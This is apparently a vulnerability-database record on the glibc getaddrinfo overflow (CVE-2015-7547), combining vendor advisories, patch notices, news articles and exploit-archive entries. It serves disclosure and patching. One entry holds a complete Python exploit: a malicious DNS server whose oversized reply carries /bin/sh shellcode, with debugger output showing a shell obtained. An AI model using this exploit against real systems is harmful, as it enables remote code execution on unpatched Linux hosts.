limited to 512 bytes. ProxySG 6.5 and 6.6 customers can use the following CPL syntax:\n \n \n <dns-proxy>\n dns.request.threat_risk.level=7.. 
dns.respond(refused)\n \n <dns-proxy> dns.client_transport=tcp\n dns.response.cname.length=1024.. dns.respond(refused)\n dns.response.ptr.length=1024.. dns.respond(refused)\n \n <dns-proxy> dns.client_transport=udp\n dns.response.cname.length=512.. dns.respond(refused)\n dns.response.ptr.length=512.. dns.respond(refused)\n \n\n### REFERENCES\n\n \n\n\nGoogle Security Team announcement and analysis - <https://security.googleblog.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>\n\n### REVISION\n\n \n\n\n2017-02-07 MC 1.8 is not vulnerable. Vulnerability inquiries for DLP should be addressed to Digital Guardian technical support. SA status moved to Final. \n2016-12-04 SSLV 3.11 is not vulnerable. PacketShaper S-Series 11.7 is not vulnerable. \n2016-11-17 Cloud Data Protection for Oracle Field Service Cloud is not vulnerable. \n2016-11-11 SSLV 3.10 is not vulnerable. \n2016-10-26 MC 1.6 and 1.7 are not vulnerable. \n2016-09-01 A fix for SSLV 3.8.4FC is available in 3.8.4FC-55. \n2016-08-12 Security Analytics 7.2 is not vulnerable. \n2016-07-16 A fix for XOS 10.0 is available in 10.0.6. A fix for XOS 11.0 is available in 11.0.2. \n2016-06-30 PacketShaper S-Series 11.6 is not vulnerable. \n2016-06-27 Fixes will not be provided for PacketShaper S-Series 11.2, 11.3, and 11.4. Please upgrade to a later version with the vulnerability fixes. \n2016-06-23 A fix for ASG is available in 6.6.4.1. \n2016-06-14 A fix for SA 7.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2016-06-13 Fixes for ICSP, NNP, and NSP are available in 5.3.6. \n2016-05-19 Fixes are available in Security Analytics 6.6.12 and 7.1.11. \n2016-05-11 No Cloud Data Protection products are vulnerable. \n2016-04-28 A fix for PacketShaper S-Series 11.5 is available in 11.5.3.1. A fix for PolicyCenter S-Series is available in 1.1.2.1. \n2016-04-24 Mail Transfer Defense is not vulnerable. \n2016-04-15 A fix will not be provided for CAS 1.2. 
Please upgrade to a later version with the vulnerability fixes. \n2016-04-01 A fix for Reporter 10.1 is available in 10.1.4.1. \n2016-03-23 XOS 9.7 is not vulnerable. \n2016-03-17 A fix for SSLV 3.8 is available in 3.8.6-14. \n2016-03-14 Fixes are available for CAS 1.3 in 1.3.6.1 and for MC 1.5 in 1.5.3.1. \n2016-03-10 A fix for MAA 4.2 is available in 4.2.8 \n2016-03-04 A fix for SSLV 3.9 is available in 3.9.3.3. \n2016-02-29 Added CVSS v2 score \n2016-02-19 initial public release\n", "modified": "2017-02-07T07:00:00", "published": "2016-02-19T07:00:00", "id": "SMNTC-1348", "href": "", "type": "symantec", "title": "SA114 : GNU C Library (glibc) Remote Code Execution February 2016", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:58", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "It was discovered that the GNU C Library incorrectly handled receiving \nresponses while performing DNS resolution. A remote attacker could use this \nissue to cause the GNU C Library to crash, resulting in a denial of \nservice, or possibly execute arbitrary code.", "edition": 5, "modified": "2016-02-16T00:00:00", "published": "2016-02-16T00:00:00", "id": "USN-2900-1", "href": "https://ubuntu.com/security/notices/USN-2900-1", "title": "GNU C Library vulnerability", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:49", "description": "\nglibc - getaddrinfo Remote Stack Buffer Overflow", "edition": 1, "published": "2016-09-06T00:00:00", "title": "glibc - getaddrinfo Remote Stack Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-09-06T00:00:00", "id": "EXPLOITPACK:F166ACAD2E7FB4051F3FE1B40BED2A86", "href": "", "sourceData": "/*\n\nadd by SpeeDr00t@Blackfalcon (jang kyoung chip)\n\nThis is a published vulnerability by google in the past.\nPlease refer to the 
link below.\n \nReference: \n- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\n- https://github.com/fjserna/CVE-2015-7547\n- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow \n\nWhen Google announced about this code(vulnerability), \nit was missing information on shellcode.\nSo, I tried to completed the shellcode.\nIn the future, I hope to help your study.\n \n\n(gdb) r\nStarting program: /home/haker/client1 \nGot object file from memory but can't read symbols: File truncated.\n[UDP] Total Data len recv 36\n[UDP] Total Data len recv 36\nudp send \nsendto 1 \nTCP Connected with 127.0.0.1:60259\n[TCP] Total Data len recv 76\n[TCP] Request1 len recv 36\ndata1 = \u00ef\u00bf\u00bd\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$(\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\n[TCP] Request2 len recv 36\nsendto 2 \ndata1_reply\ndata2_reply\n[UDP] Total Data len recv 36\n[UDP] Total Data len recv 36\nudp send \nsendto 1 \nTCP Connected with 127.0.0.1:60260\n[TCP] Total Data len recv 76\n[TCP] Request1 len recv 36\ndata1 = \u00ef\u00bf\u00bd\u00ef\u00bf\u00bd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$\u00ef\u00bf\u00bd7\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\n[TCP] Request2 len recv 36\nsendto 2 \ndata1_reply\ndata2_reply\nprocess 6415 is executing new program: /bin/dash\n$ id\nuid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)\n$ \n\n*/\n\n\n\n\nimport socket\nimport time\nimport struct\nimport threading\n\nIP = '192.168.111.5' # Insert your ip for bind() here...\nANSWERS1 = 184\n\nterminate = False\nlast_reply = None\nreply_now = threading.Event()\n\n\ndef dw(x):\n return struct.pack('>H', x)\n\ndef dd(x):\n 
return struct.pack('>I', x)\n\ndef dl(x):\n return struct.pack('<Q', x)\n\ndef db(x):\n return chr(x)\n\ndef udp_thread():\n global terminate\n\n # Handle UDP requests\n sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock_udp.bind((IP, 53))\n\n reply_counter = 0\n counter = -1\n\n answers = []\n\n while not terminate:\n data, addr = sock_udp.recvfrom(1024)\n print '[UDP] Total Data len recv ' + str(len(data))\n id_udp = struct.unpack('>H', data[0:2])[0]\n query_udp = data[12:]\n\n # Send truncated flag... so it retries over TCP\n data = dw(id_udp) # id\n data += dw(0x8380) # flags with truncated set\n data += dw(1) # questions\n data += dw(0) # answers\n data += dw(0) # authoritative\n data += dw(0) # additional\n data += query_udp # question\n data += '\\x00' * 2500 # Need a long DNS response to force malloc \n\n answers.append((data, addr))\n\n if len(answers) != 2:\n continue\n\n counter += 1\n\n if counter % 4 == 2:\n answers = answers[::-1]\n\n\n print 'udp send '\n time.sleep(0.01)\n sock_udp.sendto(*answers.pop(0))\n\n print 'sendto 1 '\n reply_now.wait()\n sock_udp.sendto(*answers.pop(0))\n print 'sendto 2 '\n\n sock_udp.close()\n\n\ndef tcp_thread():\n global terminate\n counter = -1\n\n #Open TCP socket\n sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock_tcp.bind((IP, 53))\n sock_tcp.listen(10)\n\n print 'a'\n\t\n while not terminate:\n conn, addr = sock_tcp.accept()\n counter += 1\n print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])\n\n # Read entire packet\n data = conn.recv(1024)\n print '[TCP] Total Data len recv ' + str(len(data))\n\n reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])\n print '[TCP] Request1 len recv ' + str(reqlen1)\n data1 = data[2:2+reqlen1]\n\n print 'data1 = ' +data1\n\n id1 = struct.unpack('>H', data1[0:2])[0]\n query1 = data[12:]\n\n print 'query = ' + 
query1\n\n # Do we have an extra request?\n data2 = None\n if len(data) > 2+reqlen1:\n reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])\n print '[TCP] Request2 len recv ' + str(reqlen2)\n data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]\n id2 = struct.unpack('>H', data2[0:2])[0]\n query2 = data2[12:]\n\n\n\n # Reply them on different packets\n data = ''\n data += dw(id1) # id\n data += dw(0x8180) # flags\n data += dw(1) # questions\n data += dw(ANSWERS1) # answers\n data += dw(0) # authoritative\n data += dw(0) # additional\n data += query1 # question\n\n\n\n for i in range(ANSWERS1):\n answer = dw(0xc00c) # name compressed\n answer += dw(1) # type A\n answer += dw(1) # class\n answer += dd(13) # ttl\n answer += dw(4) # data length\n answer += 'D' * 4 # data\n\n data += answer\n\n data1_reply = dw(len(data)) + data\n\n if data2:\n data = ''\n data += dw(id2)\n data += 'A' * (6)\n data += '\\x08\\xc5\\xff\\xff\\xff\\x7f\\x00\\x00'\n data += '\\x90' * (44)\n data += '\\x90' * (1955)\n data += '\\x48\\x31\\xff\\x57\\x57\\x5e\\x5a\\x48\\xbf\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\\xc1\\xef\\x08\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05'\n data += '\\x90' * (100)\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\n data += 'F' * (8)\n data += '\\xc0\\xc4\\xff\\xff\\xff\\x7f\\x00\\x00'\n data += 'G' * (134)\n data2_reply = dw(len(data)) + data\n else:\n data2_reply = None\n\n reply_now.set()\n time.sleep(0.01)\n conn.sendall(data1_reply)\n print 'data1_reply'\n time.sleep(0.01)\n if data2:\n conn.sendall(data2_reply)\n print 'data2_reply'\n\n reply_now.clear()\n\n sock_tcp.shutdown(socket.SHUT_RDWR)\n sock_tcp.close()\n\n\nif __name__ == \"__main__\":\n\n t = threading.Thread(target=udp_thread)\n t.daemon = True\n t.start()\n tcp_thread()\n terminate = True", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:05:49", "description": "\nglibc - getaddrinfo Stack Buffer Overflow (PoC)", "edition": 1, 
"published": "2016-02-16T00:00:00", "title": "glibc - getaddrinfo Stack Buffer Overflow (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-02-16T00:00:00", "id": "EXPLOITPACK:DD5C62A73445C642253B1991DCB09412", "href": "", "sourceData": "Sources: \nhttps://googleonlinesecurity.blogspot.sg/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\nhttps://github.com/fjserna/CVE-2015-7547\n\nTechnical information:\n\nglibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query.\n\nLater on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\n\nUnder certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\n\nThe vectors to trigger this buffer overflow are very common and can include ssh, sudo, and curl. We are confident that the exploitation vectors are diverse and widespread; we have not attempted to enumerate these vectors further.\n\nWe are providing this code as-is. You are responsible for protecting yourself,\nyour property and data, and others from any risks caused by this code. This\ncode may cause unexpected and undesirable behavior to occur on your machine.\nThis code may not detect the vulnerability on your system.\n\nNote that this POC consists of two components: server code and client code.\nThe server code triggers the vulnerability and therefore will crash the client\ncode. 
Note also that it is necessary to set the nameserver to point to the\nserver code, and doing so could cause other programs that call into the\ngetaddrinfo() function to crash while testing is underway. This POC code is\nprovided \"as is\" with no warranties, whether express or implied, including\nwithout limitation any warranties or merchantability, fitness for a particular\nuse and noninfringement. Google assumes no responsibility for your proper\ninstallation and use of the POC code.\n\n\nProof of Concept:\nhttps://github.com/fjserna/CVE-2015-7547/archive/master.zip\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39454-1.zip", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:37", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "New glibc packages are available for Slackware 14.1 and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/glibc-2.17-i486-11_slack14.1.txz: Rebuilt.\n This update provides a patch to fix the stack-based buffer overflow in\n libresolv that could allow specially crafted DNS responses to seize\n control of execution flow in the DNS client (CVE-2015-7547). However,\n due to a patch applied to Slackware's glibc back in 2009 (don't use the\n gethostbyname4() lookup method as it was causing some cheap routers to\n misbehave), we were not vulnerable to that issue. Nevertheless it seems\n prudent to patch the overflows anyway even if we're not currently using\n the code in question. 
Thanks to mancha for the backported patch.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547\n (* Security fix *)\npatches/packages/glibc-i18n-2.17-i486-11_slack14.1.txz: Rebuilt.\npatches/packages/glibc-profile-2.17-i486-11_slack14.1.txz: Rebuilt.\npatches/packages/glibc-solibs-2.17-i486-11_slack14.1.txz: Rebuilt.\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-2.17-i486-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-i18n-2.17-i486-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-profile-2.17-i486-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/glibc-solibs-2.17-i486-11_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-2.17-x86_64-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-i18n-2.17-x86_64-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-profile-2.17-x86_64-11_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/glibc-solibs-2.17-x86_64-11_slack14.1.txz\n\nUpdated packages for Slackware 
-current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/glibc-solibs-2.23-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-2.23-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-i18n-2.23-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/glibc-profile-2.23-i586-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/glibc-solibs-2.23-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-2.23-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-i18n-2.23-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/glibc-profile-2.23-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.1 packages:\n4c56432d638adc8098661cfa818b5bc9 glibc-2.17-i486-11_slack14.1.txz\n5c316d6b0a8970fe15fbdf2adff8de19 glibc-i18n-2.17-i486-11_slack14.1.txz\na937d842e5ca3d0b125230c23285f8f4 glibc-profile-2.17-i486-11_slack14.1.txz\n442f01d094d350612c1fb1fcb5e7fbe7 glibc-solibs-2.17-i486-11_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\neec88d584a79909ec79aae1c43c330d3 glibc-2.17-x86_64-11_slack14.1.txz\nd8b396eb6ada65d1555e3cf0fb8246c2 glibc-i18n-2.17-x86_64-11_slack14.1.txz\ne7deaabfe3e467cbde10ba5b7748bbbb glibc-profile-2.17-x86_64-11_slack14.1.txz\n629c93f0e510d354ff66e61f1ebe8b67 glibc-solibs-2.17-x86_64-11_slack14.1.txz\n\nSlackware -current packages:\nb11873e4f851a600b57a2e7a2ac8f472 a/glibc-solibs-2.23-i586-1.txz\n5116eec63fab5e7dbc58d27fecd48684 l/glibc-2.23-i586-1.txz\nae9b8a8e4ead59aa398212d6893d7ddc l/glibc-i18n-2.23-i586-1.txz\n61154e43ee4c0739dd5d3c4ce3b60ae6 l/glibc-profile-2.23-i586-1.txz\n\nSlackware x86_64 -current packages:\nc48a55c8a39dc8e17e04796e4f160bd0 a/glibc-solibs-2.23-x86_64-1.txz\n36104e1a004b0e97d193c2132f18222d 
l/glibc-2.23-x86_64-1.txz\ne0415f66d17323c8f6df339cfd49051b l/glibc-i18n-2.23-x86_64-1.txz\nf5433793e9da696a60f2445559f1d33f l/glibc-profile-2.23-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg glibc-*.txz", "modified": "2016-02-23T19:50:50", "published": "2016-02-23T19:50:50", "id": "SSA-2016-054-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.569827", "type": "slackware", "title": "[slackware-security] glibc", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:46", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "description": "Not since Stagefright have we had a vulnerability with the scale and reach of the [glibc flaw](<https://threatpost.com/critical-glibc-vulnerability-puts-all-linux-machines-at-risk/116261/>) disclosed on Tuesday.\n\n\u201cIt\u2019s pretty bad; you don\u2019t get bugs of this magnitude too often,\u201d said Dan Kaminsky, researcher, cofounder and chief scientist at White Ops. \u201cThe code path is widely exposed and available, and it yields remote code execution.\u201d\n\nThe flaw affects most Linux servers, along with a number of web frameworks and services that make use of the open source GNU C library, including ssh, sudo, curl, PHP, Rails and others. Initial reports about the impact on Android were incorrect given that the OS uses the Bionic libc implementation and not glibc.\n\nThe harshness of the bug, a stack-based buffer overflow, rests in the fact that it lives in the glibc DNS client-side resolver, or libresolv library. Since DNS is a core network technology and most services rely on it, the horizontal scale of this bug is massive.\n\n\u201cAn attack would first force a system to make specific DNS queries, using domain names controlled by the attacker. 
The attacker would then have to run custom-written DNS server software, which generates crafted responses that trigger the vulnerability,\u201d Red Hat engineer Florian Weimer told Threatpost. It\u2019s believed that the most direct exploitation vector would be a man-in-the-middle attack where an attacker would already be on the local network. \u201cWe do not know how difficult it is to exploit this over the Internet. We assume this is a possibility,\u201d Weimer said, adding that he was not aware of any public exploits.\n\nKaminsky added that while man-in-the-middle attacks are problematic, it would be much worse if the flaw were exploitable through DNS caching-only servers.\n\n\u201cThese servers do some scrubbing to make sure the name that comes back meets a bunch of rules. It dramatically reduces the exploitability of many flaws,\u201d Kaminsky said. \u201cThe researchers are being cagey, but if they accidentally found the bug through the caching name server, in that case, it could just cause a server to look up an arbitrary name. This would be substantially worse if it went through the caching ecosystem; 99 percent of attack vectors go through that system.\u201d\n\nCarlos O\u2019Donnell of Red Hat wouldn\u2019t commit to that scenario yesterday in an [advisory](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>).\n\n\u201cA back of the envelope analysis shows that it should be possible to write correctly formed DNS responses with attacker controlled payloads that will penetrate a DNS cache hierarchy and therefore allow attackers to exploit machines behind such caches,\u201d he wrote.\n\nAdding to the severity of the issue is the fact that the vulnerability was introduced in glibc 2.9, which dates back to May 2008, giving attackers close to eight years to find and abuse the bug.\n\n\u201cWe know as fact that multiple research groups found this and successfully coordinated work to fix it, which is very good,\u201d Kaminsky said. 
\u201cBut we know its been around a decent amount of time, and we know it\u2019s a golden vector that gets into all sorts of goodies. Likely, this has been discovered and exploited in the field.\u201d\n\nThe bug, CVE-2015-7547, was discovered independently by researchers at Red Hat and Google who privately disclosed the issue to upstream glibc maintainers, Weimer told Threatpost. Coordination between the two camps began on Jan. 6, though the initial bug disclosure was made last July, according to an [advisory](<https://sourceware.org/bugzilla/show_bug.cgi?id=18665>) on the glibc mailing list.\n\nWeimer said that most Linux distributions that use glibc have patches available and a regular system upgrade followed by a reboot will address the issue. Source code patches for those who have their own software builds are also available.\n\n\u201cMost GNU/Linux distributions release glibc updates multiple times per year,\u201d Weimer said. \u201cThese updates include not just security fixes, but also other bug fixes and performance enhancements. Fixes for glibc may be bundled with Linux kernel updates, making it beneficial to update both at the same time before a reboot.\u201d\n\nGoogle\u2019s Fermin Serna said there are temporary mitigations that can be implemented until Linux machines can be patched, including limiting the size of a UDP or TCP response accepted by a DNS resolver, and to ensure that DNS queries are sent only to servers that limit the response size. Kaminsky, however, said that most network admins would be unlikely to implement those mitigations for fear of breaking other services.\n\n\u201cThey\u2019re still finding bugs of this magnitude accidentally,\u201d Kaminsky said. \u201cUsing ambient bug discovery on core infrastructure is too slow. This was written in 2008 and it sat there year after year. 
We need to stop accidentally finding these bugs and start comprehensively finding them.\u201d\n\nKaminsky added that more comprehensive mitigations need to be deployed and enforced.\n\n\u201cWe need to figure out how to reach a higher level of assurance on low-performance, high-risk code paths,\u201d he said.\n", "modified": "2016-02-17T21:01:47", "published": "2016-02-17T16:01:47", "id": "THREATPOST:85ADF3548849401007E4326098F0A726", "href": "https://threatpost.com/magnitude-of-glibc-vulnerability-coming-to-light/116296/", "type": "threatpost", "title": "Magnitude of glibc Vulnerability Coming to Light", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:55:47", "bulletinFamily": "info", "cvelist": ["CVE-2015-7547"], "description": "Glibc, the GNU C library at the core of last year\u2019s [GHOST vulnerability](<https://threatpost.com/ghost-glibc-remote-code-execution-vulnerability-affects-all-linux-systems/110679/>), is vulnerable to another critical flaw affecting nearly all Linux machines, as well as API web services and major web frameworks where the code runs.\n\nThe vulnerability, discovered independently by researchers at Google and Red Hat, has been [patched](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>).\n\nThe flaw, CVE-2015-7547, is a stack-based buffer overflow in the glibc DNS client-side resolver that puts Linux machines at risk for remote code execution. The flaw is triggered when the getaddrinfo() library function is used, Google said today in its [advisory](<https://googleonlinesecurity.blogspot.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>).\n\n\u201cOverflowing bytes are entirely under the control of the attacker and are the result of a crafted DNS response,\u201d said a separate [advisory](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) posted by Carlos O\u2019Donnell of Red Hat. 
O\u2019Donnell and Florian Weimer of Red Hat worked on the patch along with Google researcher Fermin J. Serna.\n\n\u201cA back of the envelope analysis shows that it should be possible to write correctly formed DNS responses with attacker controlled payloads that will penetrate a DNS cache hierarchy and therefore allow attackers to exploit machines behind such caches,\u201d O\u2019Donnell said. It\u2019s likely that all Linux servers and web frameworks such as Rails, PHP and Python are affected, as well as Android apps running glibc.\n\nThe bug was reported to the glibc maintainers last July, but was apparently introduced in glibc 2.9 in May 2008. O\u2019Donnell said in the advisory that the vulnerability has likely not been publicly attacked.\n\n\u201cLocal testing shows that we have been able to control at least the execution of one free() call with the buffer overflow and gained control of EIP,\u201d O\u2019Donnell said. \u201cFurther exploitation was not attempted, only this single attempt to show that it is very likely that execution control can be gained without much more effort.\u201d\n\nExperts urge admins to patch immediately.\n\n\u201cIt qualifies as an urgent \u2018patch today\u2019 vulnerability,\u201d said Kenneth White, security researcher and director of the Open Crypto Audit Project (OCAP).\n\nGoogle\u2019s Serna confirmed the issue affects all versions of glibc since 2.9 and added that there are temporary mitigations that can be implemented until Linux machines can be patched.\n\n\u201cThe vulnerability relies on an oversized (2048+ bytes) UDP or TCP response, which is followed by another response that will overwrite the stack,\u201d Serna said. 
\u201cOur suggested mitigation is to limit the response (i.e., via DNSMasq or similar programs) sizes accepted by the DNS resolver locally as well as to ensure that DNS queries are sent only to DNS servers which limit the response size for UDP responses with the truncation bit set.\u201d\n\nGoogle said that a number of exploitation vectors can be used to attack this vulnerability, including but not limited to ssh, sudo and curl.\n\n\u201cRemote code execution is possible, but not straightforward,\u201d Serna said. \u201cIt requires bypassing the security mitigations present on the system, such as ASLR.\u201d\n\nGlibc is the C library that defines system calls and other basic functions on Linux systems including the GNU OS and GNU Linux.\n", "modified": "2016-02-17T19:35:09", "published": "2016-02-16T12:00:37", "id": "THREATPOST:C83FE8B4B85CD379E535AF0E229EB5D2", "href": "https://threatpost.com/critical-glibc-vulnerability-puts-all-linux-machines-at-risk/116261/", "type": "threatpost", "title": "glibc Linux remote code execution vulnerability", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:29:42", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "This update for glibc fixes the following security issues:\n\n * fix stack overflow in the glibc libresolv DNS resolver function\n getaddrinfo(), known as CVE-2015-7547. 
It is a client side\n networked/remote vulnerability.\n\n", "edition": 1, "modified": "2016-02-19T12:11:39", "published": "2016-02-19T12:11:39", "id": "OPENSUSE-SU-2016:0512-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00044.html", "type": "suse", "title": "Security update for glibc (critical)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:21:19", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7547"], "description": "This update for glibc fixes the following security issues:\n\n * fix stack overflow in the glibc libresolv DNS resolver function\n getaddrinfo(), known as CVE-2015-7547. It is a client side\n networked/remote vulnerability.\n\n", "edition": 1, "modified": "2016-02-19T12:11:34", "published": "2016-02-19T12:11:34", "id": "OPENSUSE-SU-2016:0511-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00043.html", "type": "suse", "title": "Security update for glibc (critical)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-09-06T21:28:11", "description": "glibc - getaddrinfo Stack Based Buffer Overflow. CVE-2015-7547. 
Remote exploit for Linux platform", "published": "2016-09-06T00:00:00", "type": "exploitdb", "title": "glibc - getaddrinfo Stack Based Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7547"], "modified": "2016-09-06T00:00:00", "id": "EDB-ID:40339", "href": "https://www.exploit-db.com/exploits/40339/", "sourceData": "'''\r\nadd by SpeeDr00t@Blackfalcon (jang kyoung chip)\r\n\r\nThis is a published vulnerability by google in the past.\r\nPlease refer to the link below.\r\n \r\nReference: \r\n- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\r\n- https://github.com/fjserna/CVE-2015-7547\r\n- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow \r\n\r\nWhen Google announced about this code(vulnerability), \r\nit was missing information on shellcode.\r\nSo, I tried to completed the shellcode.\r\nIn the future, I hope to help your study.\r\n \r\n \r\n(gdb) gdb -q client1\r\nUndefined command: \"gdb\". Try \"help\".\r\n(gdb) r\r\nStarting program: /home/haker/client1 \r\nGot object file from memory but can't read symbols: File truncated.\r\n[UDP] Total Data len recv 36\r\n[UDP] Total Data len recv 36\r\nudp send \r\nsendto 1 \r\nTCP Connected with 127.0.0.1:60259\r\n[TCP] Total Data len recv 76\r\n[TCP] Request1 len recv 36\r\ndata1 = \ufffd\ufffd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\r\nquery = \u0003foo\u0003bar\u0006google\u0003com\u0001\u0001$(\ufffd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u001c\u0001\r\n[TCP] Request2 len recv 36\r\nsendto 2 \r\ndata1_reply\r\ndata2_reply\r\n[UDP] Total Data len recv 36\r\n[UDP] Total Data len recv 36\r\nudp send \r\nsendto 1 \r\nTCP Connected with 127.0.0.1:60260\r\n[TCP] Total Data len recv 76\r\n[TCP] Request1 len recv 36\r\ndata1 = \ufffd\ufffd\u0001\u0001\u0003foo\u0003bar\u0006google\u0003com\u0001\u0001\r\nquery = 
